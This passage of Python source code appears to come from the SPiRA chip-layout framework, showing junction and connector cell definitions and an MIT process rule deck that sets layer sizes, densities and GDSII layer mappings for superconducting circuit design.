elems += spira.SRef(i4, midpoint=m5.center)
return elems
def create_ports(self, ports):
for p in self.j5.ports:
if p.name == 'M6_e1':
el = p.edgelayer.copy(datatype=199)
ports += p.copy(name='P2', text_type=self.text_type, edgelayer=el)
if p.name == 'M6_e3':
el = p.edgelayer.copy(datatype=199)
ports += p.copy(name='P1', text_type=self.text_type, edgelayer=el)
return ports
from spira.netex.containers import __CellContainer__
class Connector(__CellContainer__):
""" Contains the expanded cell for connection detection. """
def create_elements(self, elems):
elems = self.cell.elements
return elems
def create_ports(self, ports):
elems = self.cell.elements
# ports = elems[0].ports & elems[1]
# ports = elems[0].ports
for i in range(len(elems)):
for j in range(len(elems)):
if i != j:
e1 = elems[i]
e2 = elems[j]
if e1.layer == e2.layer:
if e1.layer.layer.number == 60:
pl = elems[i].ports & elems[j]
for p in pl:
ports += p
return ports
if __name__ == '__main__':
cell = spira.Cell(name='Junction', doc='Contains all the implemented junction devices.')
T = spira.Rotation(0)
j1 = Junction()
S = spira.SRef(j1, midpoint=(0, 0), transformation=T)
# D = S.expand_flat_copy()
# D.gdsii_output()
# connector = Connector(cell=D)
# # connector.ports
# connector.gdsii_output()
cell += S
cell.gdsii_output()
# j1 = Junction()
# cell += spira.SRef(j1, midpoint=(0, 0), transformation=T)
# j2 = Junction(length=1.5)
# cell += spira.SRef(j2, midpoint=(5, 0), transformation=T)
# j3 = Junction(width=1.2)
# cell += spira.SRef(j3, midpoint=(10, 0), transformation=T)
# j4 = Junction(radius=1.2)
# cell += spira.SRef(j4, midpoint=(15,0), transformation=T)
# j5 = Junction(gnd_via=True)
# cell += spira.SRef(j5, midpoint=(20,0), transformation=T)
# j6 = Junction(sky_via=True)
# cell += spira.SRef(j6, midpoint=(25,0), transformation=T)
# j7 = Junction(gnd_via=True, sky_via=True)
# cell += spira.SRef(j7, midpoint=(30,0), transformation=T)
# print(Junction.length.__doc__)
# print(Junction.width.__doc__)
# print(Junction.radius.__doc__)
# cell.gdsii_output()
```
#### File: mit/process/database.py
```python
from spira.yevon.process.all import *
from spira.yevon.process import get_rule_deck
RDD = get_rule_deck()
# --------------------------------- Metals --------------------------------------
RDD.L0 = ParameterDatabase()
RDD.L0.MIN_SIZE = 2.0
RDD.L0.MAX_WIDTH = 20.0
RDD.M0 = ParameterDatabase()
RDD.M0.MIN_SIZE = 0.5
RDD.M0.MAX_WIDTH = 20.0
RDD.M0.LAYER = 0.0
RDD.M0.MIN_DENSITY = 15.0
RDD.M0.MAX_DENSITY = 85.0
RDD.M1 = ParameterDatabase()
RDD.M1.MIN_SIZE = 0.5
RDD.M1.MAX_WIDTH = 20.0
RDD.M1.LAYER = 10.0
RDD.M1.MIN_SPACE_TO_M1 = 0.5
RDD.M1.MIN_DENSITY = 15.0
RDD.M1.MAX_DENSITY = 80.0
RDD.M2 = ParameterDatabase()
RDD.M2.MIN_SIZE = 0.35
RDD.M2.MAX_WIDTH = 20.0
RDD.M2.LAYER = 20.0
RDD.M2.MIN_SPACE_TO_M2 = 0.5
RDD.M2.MIN_DENSITY = 15.0
RDD.M2.MAX_DENSITY = 80.0
RDD.M3 = ParameterDatabase()
RDD.M3.MIN_SIZE = 0.35
RDD.M3.MAX_WIDTH = 20.0
RDD.M3.LAYER = 30.0
RDD.M3.MIN_SPACE_TO_M3 = 0.5
RDD.M3.MIN_DENSITY = 15.0
RDD.M3.MAX_DENSITY = 80.0
RDD.M4 = ParameterDatabase()
RDD.M4.MIN_SIZE = 0.35
RDD.M4.MAX_WIDTH = 20.0
RDD.M4.I4_MIN_SURROUND = 0.3
RDD.M4.LAYER = 40.0
RDD.M4.MIN_SPACE_TO_M4 = 0.5
RDD.M4.MIN_DENSITY = 35.0
RDD.M4.MAX_DENSITY = 85.0
RDD.M5 = ParameterDatabase()
RDD.M5.MIN_SIZE = 0.7
RDD.M5.MAX_WIDTH = 20.0
RDD.M5.J5_MIN_SURROUND = 0.5
RDD.M5.MIN_SURROUND_OF_I5 = 0.5
RDD.M5.LAYER = 50.0
RDD.M5.MIN_SPACE_TO_M5 = 1
RDD.M5.MIN_DENSITY = 35.0
RDD.M5.MAX_DENSITY = 85.0
RDD.M6 = ParameterDatabase()
RDD.M6.MIN_SIZE = 0.5
RDD.M6.MAX_WIDTH = 20.0
RDD.M6.SPACING = 0.7
RDD.M6.I6_MIN_SURROUND = 0.5
RDD.M6.LAYER = 60.0
RDD.M6.MIN_SPACE_TO_M6 = 0.7
RDD.M6.MIN_DENSITY = 35.0
RDD.M6.MAX_DENSITY = 85.0
RDD.M7 = ParameterDatabase()
RDD.M7.MIN_SIZE = 0.5
RDD.M7.MAX_WIDTH = 20.0
RDD.M7.LAYER = 70.0
RDD.M7.MIN_SPACE_TO_M7 = 0.7
RDD.M7.MIN_DENSITY = 35.0
RDD.M7.MAX_DENSITY = 85.0
RDD.M8 = ParameterDatabase()
RDD.M8.MIN_SIZE = 10.0
RDD.M8.LAYER = 80.0
RDD.M8.MIN_SPACE_TO_M8 = 10
RDD.R5 = ParameterDatabase()
RDD.R5.MIN_SIZE = 0.5
RDD.R5.MAX_WIDTH = 5.0
RDD.R5.J5_MIN_SPACING = 0.4
RDD.R5.C5R_MIN_SURROUND = 0.35
RDD.R5.LAYER = 52.0
RDD.R5.MIN_SPACE_TO_R5 = 0.5
RDD.R5.MIN_DENSITY = 0.0
RDD.R5.MAX_DENSITY = 25.0
# --------------------------------- Vias ----------------------------------------
RDD.C0 = ParameterDatabase()
RDD.C0.MIN_SIZE = 0.7
RDD.C0.MAX_SIZE = 1.0
RDD.C0.M5_METAL = 1.0
RDD.C0.MIN_DENSITY = 0.0
RDD.C0.MAX_DENSITY = 25.0
RDD.C0.LAYER = 4
RDD.I0 = ParameterDatabase()
RDD.I0.MIN_SIZE = 0.6
RDD.I0.MAX_SIZE = 1.2
RDD.I0.M5_METAL = 1.0
RDD.I0.MIN_DENSITY = 0.0
RDD.I0.MAX_DENSITY = 25.0
RDD.I0.LAYER = 2
RDD.I1 = ParameterDatabase()
RDD.I1.MIN_SIZE = 0.6
RDD.I1.MAX_SIZE = 1.2
RDD.I1.M5_METAL = 1.0
RDD.I1.MIN_SPACE_TO_I1 = 0.7
RDD.I1.MIN_DENSITY = 0.0
RDD.I1.MAX_DENSITY = 25.0
RDD.I1.LAYER = 11
RDD.I2 = ParameterDatabase()
RDD.I2.WIDTH = 0.5
RDD.I2.MIN_SIZE = 0.6
RDD.I2.MAX_SIZE = 1.2
RDD.I2.M5_METAL = 1.0
RDD.I2.MIN_SPACE_TO_I2 = 0.7
RDD.I2.MIN_DENSITY = 0.0
RDD.I2.MAX_DENSITY = 25.0
RDD.I2.LAYER = 21
RDD.I3 = ParameterDatabase()
RDD.I3.MIN_SIZE = 0.6
RDD.I3.MAX_SIZE = 1.2
RDD.I3.M5_METAL = 1.0
RDD.I3.MIN_SPACE_TO_I3 = 0.7
RDD.I3.MIN_DENSITY = 0.0
RDD.I3.MAX_DENSITY = 25.0
RDD.I3.LAYER = 31
RDD.I4 = ParameterDatabase()
RDD.I4.MIN_SIZE = 0.8
RDD.I4.MAX_SIZE = 1.2
RDD.I4.M5_MIN_SURROUND = 0.3
RDD.I4.LAYER = 41.0
RDD.I4.MIN_SPACE_TO_I4 = 1
RDD.I4.MIN_DENSITY = 0
RDD.I4.MAX_DENSITY = 25.0
RDD.I5 = ParameterDatabase()
RDD.I5.MIN_SIZE = 0.7
RDD.I5.MAX_SIZE = 1.2
RDD.I5.M5_METAL = 1.0
RDD.I5.R5_MIN_SPACING = 0.5
RDD.I5.MIN_SURROUND_BY_M6 = 0.35
RDD.I5.LAYER = 54.0
RDD.I5.MIN_SPACE_TO_I5 = 0.7
RDD.I5.MIN_DENSITY = 0.0
RDD.I5.MAX_DENSITY = 25.0
RDD.J5 = ParameterDatabase()
RDD.J5.MIN_SIZE = 0.7
RDD.J5.MAX_SIZE = 3.0
RDD.J5.M5_METAL = 1.0
RDD.J5.M4_MIN_OVERLAP = 0.5
RDD.J5.C5J_MIN_SURROUND = 0.1
RDD.J5.I5_MIN_SPACING = 0.7
RDD.J5.LAYER = 51.0
RDD.J5.MIN_SPACE_TO_J5 = 1.1
RDD.J5.MIN_DENSITY = 5.0
RDD.J5.MAX_DENSITY = 20.0
RDD.I6 = ParameterDatabase()
RDD.I6.MIN_SIZE = 0.7
RDD.I6.M5_METAL = 1.0
RDD.I6.I5_MIN_SURROUND = 0.3
RDD.I6.M7_MIN_SURROUND = 0.35
RDD.I6.LAYER = 61.0
RDD.I6.MIN_SPACE_TO_I6 = 0.7
RDD.I7 = ParameterDatabase()
RDD.I7.MIN_SIZE = 5.0
RDD.I7.M5_METAL = 1.0
RDD.I7.MIN_SPACE_TO_I7 = 3
RDD.C5J = ParameterDatabase()
RDD.C5J.MIN_SIZE = 0.5
RDD.C5J.M6_MIN_SURROUND = 0.35
RDD.C5R = ParameterDatabase()
RDD.C5R.MIN_SIZE = 0.8
RDD.C5R.M5_METAL = 1.0
RDD.C5R.R5_MAX_SIDE_SURROUND = 0.2
RDD.C5R.R5_MIN_SURROUND = 0.35
RDD.C5R.M6_MIN_SURROUND = 0.35
RDD.C5R.I6_MIN_SPACE = 0.5
# ------------------------------- Physical Layers -------------------------------
RDD.PLAYER.M0 = PhysicalLayerDatabase()
RDD.PLAYER.M1 = PhysicalLayerDatabase()
RDD.PLAYER.M2 = PhysicalLayerDatabase()
RDD.PLAYER.M3 = PhysicalLayerDatabase()
RDD.PLAYER.M4 = PhysicalLayerDatabase()
RDD.PLAYER.M5 = PhysicalLayerDatabase()
RDD.PLAYER.M6 = PhysicalLayerDatabase()
RDD.PLAYER.M7 = PhysicalLayerDatabase()
RDD.PLAYER.R5 = PhysicalLayerDatabase()
RDD.PLAYER.METAL = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.BBOX = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.PORT = PhysicalLayer(process=RDD.PROCESS.VIRTUAL, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.IXPORT = PhysicalLayer(process=RDD.PROCESS.PORT, purpose=RDD.PURPOSE.PORT.IXPORT)
RDD.PLAYER.M0.METAL = PhysicalLayer(name='M0', process=RDD.PROCESS.M0, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M1.METAL = PhysicalLayer(name='M1', process=RDD.PROCESS.M1, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M2.METAL = PhysicalLayer(name='M2', process=RDD.PROCESS.M2, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M3.METAL = PhysicalLayer(name='M3', process=RDD.PROCESS.M3, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M4.GND = PhysicalLayer(name='M4', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.GROUND)
RDD.PLAYER.M4.HOLE = PhysicalLayer(name='M4_HOLE', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M4.BBOX = PhysicalLayer(name='M4_BBOX', process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M4.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M4.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M4.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M4.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M4.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M4, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M5.METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M5.DEVICE_METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M5.CIRCUIT_METAL = PhysicalLayer(name='M5', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M5.ROUTE = PhysicalLayer(name='M5_ROUTE', process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M5.HOLE = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M5.BBOX = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M5.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M5.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.M5.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.M5.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.M5.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M5.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M5.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M5.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M5.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.M6.METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M6.DEVICE_METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M6.CIRCUIT_METAL = PhysicalLayer(name='M6', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M6.ROUTE = PhysicalLayer(name='M6_ROUTE', process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M6.HOLE = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M6.BBOX = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M6.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M6.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M6.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.M6.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.M6.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.M6.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M6.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M6.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M6.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M6.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M6, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.M7.METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.M7.DEVICE_METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.M7.CIRCUIT_METAL = PhysicalLayer(name='M7', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.M7.ROUTE = PhysicalLayer(name='M7_ROUTE', process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.M7.HOLE = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.M7.BBOX = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.M7.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.M7.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.M7.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.M7.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.M7.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.M7.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.M7.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.M7, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
RDD.PLAYER.R5.METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.METAL)
RDD.PLAYER.R5.DEVICE_METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.DEVICE_METAL)
RDD.PLAYER.R5.CIRCUIT_METAL = PhysicalLayer(name='R5', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.CIRCUIT_METAL)
RDD.PLAYER.R5.ROUTE = PhysicalLayer(name='R5_ROUTE', process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.ROUTE)
RDD.PLAYER.R5.HOLE = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.HOLE)
RDD.PLAYER.R5.BBOX = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.BOUNDARY_BOX)
RDD.PLAYER.R5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.R5.PORT_BRANCH = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.BRANCH)
RDD.PLAYER.R5.PORT_DIRECTION = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.DIRECTION)
RDD.PLAYER.R5.PORT_PIN = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.PIN)
RDD.PLAYER.R5.PORT_TERMINAL = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.TERMINAL)
RDD.PLAYER.R5.PORT_DUMMY = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.DUMMY)
RDD.PLAYER.R5.INSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED)
RDD.PLAYER.R5.INSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED)
RDD.PLAYER.R5.OUTSIDE_EDGE_ENABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED)
RDD.PLAYER.R5.OUTSIDE_EDGE_DISABLED = PhysicalLayer(process=RDD.PROCESS.R5, purpose=RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED)
# ------------------------------- Derived Layers ----------------------------------
RDD.PLAYER.R5.EDGE_CONNECTED = RDD.PLAYER.R5.METAL & RDD.PLAYER.R5.OUTSIDE_EDGE_DISABLED
RDD.PLAYER.M5.EDGE_CONNECTED = RDD.PLAYER.M5.METAL & RDD.PLAYER.M5.OUTSIDE_EDGE_DISABLED
RDD.PLAYER.M6.EDGE_CONNECTED = RDD.PLAYER.M6.METAL & RDD.PLAYER.M6.OUTSIDE_EDGE_DISABLED
# ------------------------------- Physical Contacts ----------------------------------
RDD.PLAYER.J5 = PhysicalLayerDatabase()
RDD.PLAYER.C5J = PhysicalLayerDatabase()
RDD.PLAYER.C5R = PhysicalLayerDatabase()
RDD.PLAYER.I0 = PhysicalLayerDatabase()
RDD.PLAYER.I1 = PhysicalLayerDatabase()
RDD.PLAYER.I2 = PhysicalLayerDatabase()
RDD.PLAYER.I3 = PhysicalLayerDatabase()
RDD.PLAYER.I4 = PhysicalLayerDatabase()
RDD.PLAYER.I5 = PhysicalLayerDatabase()
RDD.PLAYER.I6 = PhysicalLayerDatabase()
RDD.PLAYER.J5.JUNCTION = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.JUNCTION)
RDD.PLAYER.J5.UNION = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.J5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.J5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.C5J.VIA = PhysicalLayer(name='C5J', process=RDD.PROCESS.C5J, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.C5R.VIA = PhysicalLayer(name='C5R', process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.C5R.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.C5R.UNION = PhysicalLayer(name='C5R', process=RDD.PROCESS.C5R, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.I0.VIA = PhysicalLayer(name='I0', process=RDD.PROCESS.I0, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I0.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I0, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I1.VIA = PhysicalLayer(name='I1', process=RDD.PROCESS.I1, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I1.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I1, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I2.VIA = PhysicalLayer(name='I2', process=RDD.PROCESS.I2, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I2.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I2, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I3.VIA = PhysicalLayer(name='I3', process=RDD.PROCESS.I3, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I3.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I3, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I4.VIA = PhysicalLayer(name='I4', process=RDD.PROCESS.I4, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I4.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I4, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I5.VIA = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I5.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.PORT.CONTACT)
RDD.PLAYER.I5.UNION = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.UNION)
RDD.PLAYER.I5.DIFFERENCE = PhysicalLayer(process=RDD.PROCESS.I5, purpose=RDD.PURPOSE.DIFFERENCE)
RDD.PLAYER.I6.VIA = PhysicalLayer(name='I6', process=RDD.PROCESS.I6, purpose=RDD.PURPOSE.VIA)
RDD.PLAYER.I6.PORT_CONTACT = PhysicalLayer(process=RDD.PROCESS.I6, purpose=RDD.PURPOSE.PORT.CONTACT)
# ------------------------------ Map GDSII Layers -------------------------------
RDD.GDSII.PROCESS_LAYER_MAP = {
RDD.PROCESS.PORT : 19,
RDD.PROCESS.VIRTUAL : 199,
RDD.PROCESS.GND : 0,
RDD.PROCESS.R5 : 52,
RDD.PROCESS.M0 : 1,
RDD.PROCESS.M1 : 10,
RDD.PROCESS.M2 : 20,
RDD.PROCESS.M3 : 30,
RDD.PROCESS.M4 : 40,
RDD.PROCESS.M5 : 50,
RDD.PROCESS.M6 : 60,
RDD.PROCESS.M7 : 70,
RDD.PROCESS.J5 : 51,
RDD.PROCESS.C5R : 56,
RDD.PROCESS.C5J : 55,
RDD.PROCESS.CM1 : 11,
RDD.PROCESS.CM2 : 21,
RDD.PROCESS.CM3 : 31,
RDD.PROCESS.I0 : 2,
RDD.PROCESS.I1 : 11,
RDD.PROCESS.I2 : 21,
RDD.PROCESS.I3 : 31,
RDD.PROCESS.I4 : 41,
RDD.PROCESS.I5 : 54,
RDD.PROCESS.I6 : 61,
RDD.PROCESS.SKY : 99,
}
RDD.GDSII.PURPOSE_DATATYPE_MAP = {
RDD.PURPOSE.GROUND : 0,
RDD.PURPOSE.METAL : 0,
RDD.PURPOSE.DEVICE_METAL : 100,
RDD.PURPOSE.CIRCUIT_METAL : 101,
RDD.PURPOSE.SKY : 3,
RDD.PURPOSE.HOLE : 4,
RDD.PURPOSE.BOUNDARY_BOX : 5,
RDD.PURPOSE.PORT.DIRECTION : 6,
RDD.PURPOSE.PORT.INSIDE_EDGE_ENABLED : 7,
RDD.PURPOSE.PORT.INSIDE_EDGE_DISABLED : 8,
RDD.PURPOSE.PORT.IXPORT : 0,
RDD.PURPOSE.VIA : 0,
RDD.PURPOSE.JUNCTION : 0,
RDD.PURPOSE.ROUTE : 11,
RDD.PURPOSE.INTERSECTED : 12,
RDD.PURPOSE.UNION : 13,
RDD.PURPOSE.DIFFERENCE : 14,
RDD.PURPOSE.PORT.PIN : 15,
RDD.PURPOSE.PORT.TERMINAL : 28,
RDD.PURPOSE.PORT.EDGE : 16,
RDD.PURPOSE.PORT.CONTACT : 17,
RDD.PURPOSE.PORT.BRANCH : 18,
RDD.PURPOSE.PORT.DUMMY : 19,
RDD.PURPOSE.PORT.ROUTE : 26,
RDD.PURPOSE.TEXT.PIN : 20,
RDD.PURPOSE.TEXT.TERMINAL : 27,
RDD.PURPOSE.TEXT.EDGE : 0,
RDD.PURPOSE.TEXT.CONTACT : 0,
RDD.PURPOSE.TEXT.ROUTE : 25,
RDD.PURPOSE.TEXT.DUMMY : 26,
RDD.PURPOSE.PORT.OUTSIDE_EDGE_ENABLED : 23,
RDD.PURPOSE.PORT.OUTSIDE_EDGE_DISABLED : 24,
RDD.PURPOSE.TEXT : 64,
}
RDD.GDSII.EXPORT_LAYER_MAP = MapPhysicalToGdsii(
process_layer_map=RDD.GDSII.PROCESS_LAYER_MAP,
purpose_datatype_map=RDD.GDSII.PURPOSE_DATATYPE_MAP
)
RDD.GDSII.IMPORT_LAYER_MAP = MapGdsiiToPhysical(
process_layer_map=RDD.GDSII.PROCESS_LAYER_MAP,
purpose_datatype_map=RDD.GDSII.PURPOSE_DATATYPE_MAP
)
# ------------------------------------- Virtual Modelling ----------------------------------------------
RDD.VMODEL = PhysicalLayerDatabase()
RDD.VMODEL.PROCESS_FLOW = VModelProcessFlow(
active_processes=[
RDD.PROCESS.M0,
RDD.PROCESS.M1,
RDD.PROCESS.M2,
RDD.PROCESS.M3,
RDD.PROCESS.M4,
RDD.PROCESS.M5,
RDD.PROCESS.M6,
RDD.PROCESS.M7,
RDD.PROCESS.R5,
RDD.PROCESS.CM1,
RDD.PROCESS.CM2,
RDD.PROCESS.CM3,
RDD.PROCESS.I0,
RDD.PROCESS.I1,
RDD.PROCESS.I2,
RDD.PROCESS.I3,
RDD.PROCESS.I4,
RDD.PROCESS.I5,
RDD.PROCESS.I6,
RDD.PROCESS.C5R,
RDD.PROCESS.C5J,
RDD.PROCESS.J5,
RDD.PROCESS.PORT
]
)
